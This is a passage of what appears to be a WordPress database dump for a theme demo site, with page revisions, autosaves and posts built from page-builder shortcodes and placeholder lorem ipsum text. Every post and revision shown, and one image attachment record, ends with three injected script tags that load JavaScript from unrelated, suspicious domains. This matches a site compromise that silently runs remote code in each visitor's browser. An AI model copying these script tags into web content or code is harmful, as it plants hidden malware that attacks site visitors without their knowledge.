#999999;\">College Students</span></li>\r\n 	<li><span style=\"color: #999999;\">Sorta Athletes</span></li>\r\n 	<li><span style=\"color: #999999;\">Dairy Farmers</span></li>\r\n</ul>\r\n[/fancy-ul][divider line_type=\"No Line\" custom_height=\"20\"][vc_column_text css=\".vc_custom_1452014599720{margin-bottom: 18px !important;}\"]\r\n<h5>Our Specialties</h5>\r\n[/vc_column_text][fancy-ul icon_type=\"standard_dash\" color=\"Extra-Color-3\" alignment=\"left\" enable_animation=\"true\"]\r\n<ul>\r\n 	<li><span style=\"color: #999999;\">Program Management</span></li>\r\n 	<li><span style=\"color: #999999;\">Graphic &amp; UI Design</span></li>\r\n 	<li><span style=\"color: #999999;\">Customer Support</span></li>\r\n 	<li><span style=\"color: #999999;\">Video Editing</span></li>\r\n 	<li><span style=\"color: #999999;\">Sound Design</span></li>\r\n</ul>\r\n[/fancy-ul][/vc_column][vc_column column_padding=\"padding-2-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/4\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text css=\".vc_custom_1452014465975{margin-bottom: 18px !important;}\"]\r\n<h5>Notable Awards</h5>\r\n[/vc_column_text][fancy-ul icon_type=\"standard_dash\" color=\"Extra-Color-3\" alignment=\"left\" enable_animation=\"true\"]\r\n<ul>\r\n 	<li><span style=\"color: #999999;\">Top Customer Support</span></li>\r\n 	<li><span style=\"color: #999999;\">Most Liked Company</span></li>\r\n 	<li><span style=\"color: #999999;\">Best In Class 2016</span></li>\r\n 	<li><span style=\"color: #999999;\">Friendliest Group</span></li>\r\n 	<li><span style=\"color: #999999;\">Innovative Brand</span></li>\r\n</ul>\r\n[/fancy-ul][divider line_type=\"No Line\" custom_height=\"20\"][vc_column_text css=\".vc_custom_1452014481555{margin-bottom: 18px !important;}\"]\r\n<h5>Featured On</h5>\r\n[/vc_column_text][fancy-ul icon_type=\"standard_dash\" color=\"Extra-Color-3\" alignment=\"left\" enable_animation=\"true\"]\r\n<ul>\r\n 	<li><span style=\"color: #999999;\">ThemeNectar Show</span></li>\r\n 	<li><span style=\"color: #999999;\">Mr. Nectar\'s Blog</span></li>\r\n 	<li><span style=\"color: #999999;\">Top WP Themes</span></li>\r\n 	<li><span style=\"color: #999999;\">ThemeForest</span></li>\r\n 	<li><span style=\"color: #999999;\">Salient</span></li>\r\n</ul>\r\n[/fancy-ul][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_gallery type=\"image_grid\" layout=\"fullwidth\" item_spacing=\"default\" constrain_max_cols=\"true\" gallery_style=\"3\" load_in_animation=\"none\" img_size=\"500x500\"][/vc_column][/vc_row]<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Our Story','','inherit','closed','closed','','19-revision-v1','','','2017-12-10 16:25:18','2017-12-10 16:25:18','',19,'http://sandbox.futuremediatrix.com/medikpro/2017/12/10/19-revision-v1/',0,'revision','',0),(6206,1,'2017-12-10 16:33:39','2017-12-10 16:33:39','<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','logo-site','','inherit','open','closed','','logo-site','','','2017-12-10 16:33:39','2017-12-10 16:33:39','',0,'http://sandbox.futuremediatrix.com/medikpro/wp-content/uploads/2017/12/logo-site.png',0,'attachment','image/png',0),(6226,1,'2017-12-14 03:43:57','2017-12-14 03:43:57','<p>[vc_row type=\"in_container\" full_screen_row_position=\"middle\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]Curabitur non erat vitae nisi finibus tempor nec eget quam. Donec ornare, risus ac vulputate accumsan, turpis felis mattis elit, tincidunt venenatis nulla neque at lacus. Nulla purus erat, elementum vitae ultricies eget, laoreet viverra augue. Quisque vel fermentum sem. Vivamus eget odio sodales tortor venenatis lobortis sit amet in felis. Pellentesque porttitor nisl erat, a tempor neque elementum quis.[/vc_column_text][/vc_column][/vc_row][vc_row type=\"in_container\" full_screen_row_position=\"middle\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"30\" bottom_padding=\"30\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"padding-2-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][split_line_heading]<br />\n<h2>Some cool text here</h2>\n<p>[/split_line_heading][/vc_column][/vc_row][vc_row type=\"in_container\" full_screen_row_position=\"middle\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" bottom_padding=\"80\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]Vestibulum non fermentum dui. Cras tellus leo, vulputate eu ligula et, finibus pretium purus. Mauris vestibulum a quam id elementum. In vitae arcu at nibh vestibulum faucibus. Donec lacus orci, consectetur lacinia convallis eu, cursus vitae eros. Interdum et malesuada fames ac ante ipsum primis in faucibus. Nullam vel tortor vitae est lobortis congue. Nullam dignissim leo sit amet metus consectetur, lacinia efficitur felis auctor. In ultrices, diam eget iaculis interdum, diam neque elementum sem, ac laoreet velit sem sit amet nibh.[/vc_column_text][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#444444\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"14%\" bottom_padding=\"14%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][/vc_column][/vc_row][vc_row type=\"in_container\" full_screen_row_position=\"middle\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"80\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]Separated they live in Bookmarksgrove right at the coast of the Semantics, a large language ocean. A small river named Duden flows by their place and supplies it with the necessary regelialia. It is a paradisematic country, in which roasted parts of sentences fly into your mouth. Even the all-powerful Pointing has no control about the blind texts it is an almost unorthographic life One day however a small line of blind text by the name of Lorem Ipsum decided to leave for the far World of Grammar. The Big Oxmox advised her not to do so, because there were thousands of bad Commas, wild Question Marks and devious Semikoli, but the Little Blind Text didn’t listen. She packed her seven versalia, put her initial into the belt and made herself on the way. l using her.Far far away, behind the word mountains, far from the countries Vokalia and Consonantia, there live the blind texts. Separated they live in Bookmarksgrove right at the coast of the Semantics, a large language ocean. A small river named Duden flows by their place and supplies it with the necessary regelialia.[/vc_column_text][/vc_column][/vc_row]</p>\n<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','The Reason We Decided to Change Locations','','inherit','closed','closed','','6144-autosave-v1','','','2017-12-14 03:43:57','2017-12-14 03:43:57','',6144,'http://sandbox.futuremediatrix.com/medikpro/2017/12/14/6144-autosave-v1/',0,'revision','',0),(6227,1,'2017-12-14 03:44:18','2017-12-14 03:44:18','[vc_row type=\"in_container\" full_screen_row_position=\"middle\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]Curabitur non erat vitae nisi finibus tempor nec eget quam. Donec ornare, risus ac vulputate accumsan, turpis felis mattis elit, tincidunt venenatis nulla neque at lacus. Nulla purus erat, elementum vitae ultricies eget, laoreet viverra augue. Quisque vel fermentum sem. Vivamus eget odio sodales tortor venenatis lobortis sit amet in felis. Pellentesque porttitor nisl erat, a tempor neque elementum quis.[/vc_column_text][/vc_column][/vc_row][vc_row type=\"in_container\" full_screen_row_position=\"middle\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"30\" bottom_padding=\"30\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"padding-2-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][split_line_heading]\r\n<h2>Some cool text here</h2>\r\n[/split_line_heading][/vc_column][/vc_row][vc_row type=\"in_container\" full_screen_row_position=\"middle\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" bottom_padding=\"80\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]Vestibulum non fermentum dui. Cras tellus leo, vulputate eu ligula et, finibus pretium purus. Mauris vestibulum a quam id elementum. In vitae arcu at nibh vestibulum faucibus. Donec lacus orci, consectetur lacinia convallis eu, cursus vitae eros. Interdum et malesuada fames ac ante ipsum primis in faucibus. Nullam vel tortor vitae est lobortis congue. Nullam dignissim leo sit amet metus consectetur, lacinia efficitur felis auctor. In ultrices, diam eget iaculis interdum, diam neque elementum sem, ac laoreet velit sem sit amet nibh.[/vc_column_text][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#444444\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"14%\" bottom_padding=\"14%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][/vc_column][/vc_row][vc_row type=\"in_container\" full_screen_row_position=\"middle\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"80\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]Sed mollis sagittis arcu ut cursus. Orci varius natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Vivamus sit amet viverra est, sit amet ullamcorper ante. Aenean est velit, volutpat at convallis in, vulputate tempus lectus. Aenean eget est non nibh vulputate vehicula. Aenean convallis, enim et congue ultrices, tortor quam ultrices felis, aliquet feugiat enim arcu gravida urna. Proin elementum nunc sem, finibus dapibus est porta sit amet. Aenean eget lectus at nulla auctor euismod. Morbi eu faucibus ligula. Nam ac posuere augue. Quisque eleifend interdum libero id luctus.[/vc_column_text][/vc_column][/vc_row]<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','The Reason We Decided to Change Locations','','inherit','closed','closed','','6144-revision-v1','','','2017-12-14 03:44:18','2017-12-14 03:44:18','',6144,'http://sandbox.futuremediatrix.com/medikpro/2017/12/14/6144-revision-v1/',0,'revision','',0),(6228,1,'2017-12-14 03:44:39','2017-12-14 03:44:39','[vc_row type=\"in_container\" full_screen_row_position=\"middle\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]Curabitur non erat vitae nisi finibus tempor nec eget quam. Donec ornare, risus ac vulputate accumsan, turpis felis mattis elit, tincidunt venenatis nulla neque at lacus. Nulla purus erat, elementum vitae ultricies eget, laoreet viverra augue. Quisque vel fermentum sem. Vivamus eget odio sodales tortor venenatis lobortis sit amet in felis. Pellentesque porttitor nisl erat, a tempor neque elementum quis.[/vc_column_text][/vc_column][/vc_row][vc_row type=\"in_container\" full_screen_row_position=\"middle\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"30\" bottom_padding=\"30\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"padding-2-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][split_line_heading]\r\n<h2>Some cool text here</h2>\r\n[/split_line_heading][/vc_column][/vc_row][vc_row type=\"in_container\" full_screen_row_position=\"middle\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" bottom_padding=\"80\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]Vestibulum non fermentum dui. Cras tellus leo, vulputate eu ligula et, finibus pretium purus. Mauris vestibulum a quam id elementum. In vitae arcu at nibh vestibulum faucibus. Donec lacus orci, consectetur lacinia convallis eu, cursus vitae eros. Interdum et malesuada fames ac ante ipsum primis in faucibus. Nullam vel tortor vitae est lobortis congue. Nullam dignissim leo sit amet metus consectetur, lacinia efficitur felis auctor. In ultrices, diam eget iaculis interdum, diam neque elementum sem, ac laoreet velit sem sit amet nibh.[/vc_column_text][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#444444\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"14%\" bottom_padding=\"14%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][/vc_column][/vc_row][vc_row type=\"in_container\" full_screen_row_position=\"middle\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"80\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]Sed mollis sagittis arcu ut cursus. Orci varius natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Vivamus sit amet viverra est, sit amet ullamcorper ante. Aenean est velit, volutpat at convallis in, vulputate tempus lectus. Aenean eget est non nibh vulputate vehicula. Aenean convallis, enim et congue ultrices, tortor quam ultrices felis, aliquet feugiat enim arcu gravida urna. Proin elementum nunc sem, finibus dapibus est porta sit amet. Aenean eget lectus at nulla auctor euismod. Morbi eu faucibus ligula. Nam ac posuere augue. Quisque eleifend interdum libero id luctus.[/vc_column_text][/vc_column][/vc_row]<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','News Testing','','inherit','closed','closed','','6144-revision-v1','','','2017-12-14 03:44:39','2017-12-14 03:44:39','',6144,'http://sandbox.futuremediatrix.com/medikpro/2017/12/14/6144-revision-v1/',0,'revision','',0),(6229,1,'2017-12-14 03:45:25','2017-12-14 03:45:25','[vc_row type=\"in_container\" full_screen_row_position=\"middle\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]Curabitur non erat vitae nisi finibus tempor nec eget quam. Donec ornare, risus ac vulputate accumsan, turpis felis mattis elit, tincidunt venenatis nulla neque at lacus. Nulla purus erat, elementum vitae ultricies eget, laoreet viverra augue. Quisque vel fermentum sem. Vivamus eget odio sodales tortor venenatis lobortis sit amet in felis. Pellentesque porttitor nisl erat, a tempor neque elementum quis.[/vc_column_text][/vc_column][/vc_row][vc_row type=\"in_container\" full_screen_row_position=\"middle\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"30\" bottom_padding=\"30\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"padding-2-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][split_line_heading]\r\n<h2>Some cool text here</h2>\r\n[/split_line_heading][/vc_column][/vc_row][vc_row type=\"in_container\" full_screen_row_position=\"middle\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" bottom_padding=\"80\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]Vestibulum non fermentum dui. Cras tellus leo, vulputate eu ligula et, finibus pretium purus. Mauris vestibulum a quam id elementum. In vitae arcu at nibh vestibulum faucibus. Donec lacus orci, consectetur lacinia convallis eu, cursus vitae eros. Interdum et malesuada fames ac ante ipsum primis in faucibus. Nullam vel tortor vitae est lobortis congue. Nullam dignissim leo sit amet metus consectetur, lacinia efficitur felis auctor. In ultrices, diam eget iaculis interdum, diam neque elementum sem, ac laoreet velit sem sit amet nibh.[/vc_column_text][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#444444\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"14%\" bottom_padding=\"14%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][/vc_column][/vc_row][vc_row type=\"in_container\" full_screen_row_position=\"middle\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"80\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]Sed mollis sagittis arcu ut cursus. Orci varius natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Vivamus sit amet viverra est, sit amet ullamcorper ante. Aenean est velit, volutpat at convallis in, vulputate tempus lectus. Aenean eget est non nibh vulputate vehicula. Aenean convallis, enim et congue ultrices, tortor quam ultrices felis, aliquet feugiat enim arcu gravida urna. Proin elementum nunc sem, finibus dapibus est porta sit amet. Aenean eget lectus at nulla auctor euismod. Morbi eu faucibus ligula. Nam ac posuere augue. Quisque eleifend interdum libero id luctus.[/vc_column_text][/vc_column][/vc_row]<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Promo Testing','','publish','open','open','','promo-testing','','','2017-12-14 03:45:25','2017-12-14 03:45:25','',0,'http://sandbox.futuremediatrix.com/medikpro/?p=6229',0,'post','',0),(6230,1,'2017-12-14 03:45:25','2017-12-14 03:45:25','[vc_row type=\"in_container\" full_screen_row_position=\"middle\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]Curabitur non erat vitae nisi finibus tempor nec eget quam. Donec ornare, risus ac vulputate accumsan, turpis felis mattis elit, tincidunt venenatis nulla neque at lacus. Nulla purus erat, elementum vitae ultricies eget, laoreet viverra augue. Quisque vel fermentum sem. Vivamus eget odio sodales tortor venenatis lobortis sit amet in felis. Pellentesque porttitor nisl erat, a tempor neque elementum quis.[/vc_column_text][/vc_column][/vc_row][vc_row type=\"in_container\" full_screen_row_position=\"middle\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"30\" bottom_padding=\"30\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"padding-2-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][split_line_heading]\r\n<h2>Some cool text here</h2>\r\n[/split_line_heading][/vc_column][/vc_row][vc_row type=\"in_container\" full_screen_row_position=\"middle\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" bottom_padding=\"80\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]Vestibulum non fermentum dui. Cras tellus leo, vulputate eu ligula et, finibus pretium purus. Mauris vestibulum a quam id elementum. In vitae arcu at nibh vestibulum faucibus. Donec lacus orci, consectetur lacinia convallis eu, cursus vitae eros. Interdum et malesuada fames ac ante ipsum primis in faucibus. Nullam vel tortor vitae est lobortis congue. Nullam dignissim leo sit amet metus consectetur, lacinia efficitur felis auctor. In ultrices, diam eget iaculis interdum, diam neque elementum sem, ac laoreet velit sem sit amet nibh.[/vc_column_text][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#444444\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"14%\" bottom_padding=\"14%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][/vc_column][/vc_row][vc_row type=\"in_container\" full_screen_row_position=\"middle\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"80\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]Sed mollis sagittis arcu ut cursus. Orci varius natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Vivamus sit amet viverra est, sit amet ullamcorper ante. Aenean est velit, volutpat at convallis in, vulputate tempus lectus. Aenean eget est non nibh vulputate vehicula. Aenean convallis, enim et congue ultrices, tortor quam ultrices felis, aliquet feugiat enim arcu gravida urna. Proin elementum nunc sem, finibus dapibus est porta sit amet. Aenean eget lectus at nulla auctor euismod. Morbi eu faucibus ligula. Nam ac posuere augue. Quisque eleifend interdum libero id luctus.[/vc_column_text][/vc_column][/vc_row]<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Promo Testing','','inherit','closed','closed','','6229-revision-v1','','','2017-12-14 03:45:25','2017-12-14 03:45:25','',6229,'http://sandbox.futuremediatrix.com/medikpro/2017/12/14/6229-revision-v1/',0,'revision','',0),(6231,1,'2017-12-14 03:46:30','2017-12-14 03:46:30','[vc_row type=\"full_width_content\" full_screen_row_position=\"middle\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][recent_posts style=\"slider\" category=\"all\" order=\"DESC\" orderby=\"date\" slider_size=\"450\" posts_per_page=\"3\"][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"40\" bottom_padding=\"40\" id=\"blog\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][nectar_blog layout=\"masonry-blog-full-screen-width\" blog_masonry_style=\"inherit\" category=\"all\" enable_pagination=\"true\" pagination_type=\"infinite_scroll\" load_in_animation=\"fade_in_from_bottom\" order=\"DESC\" orderby=\"date\" posts_per_page=\"10\"][/vc_column][/vc_row]<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' 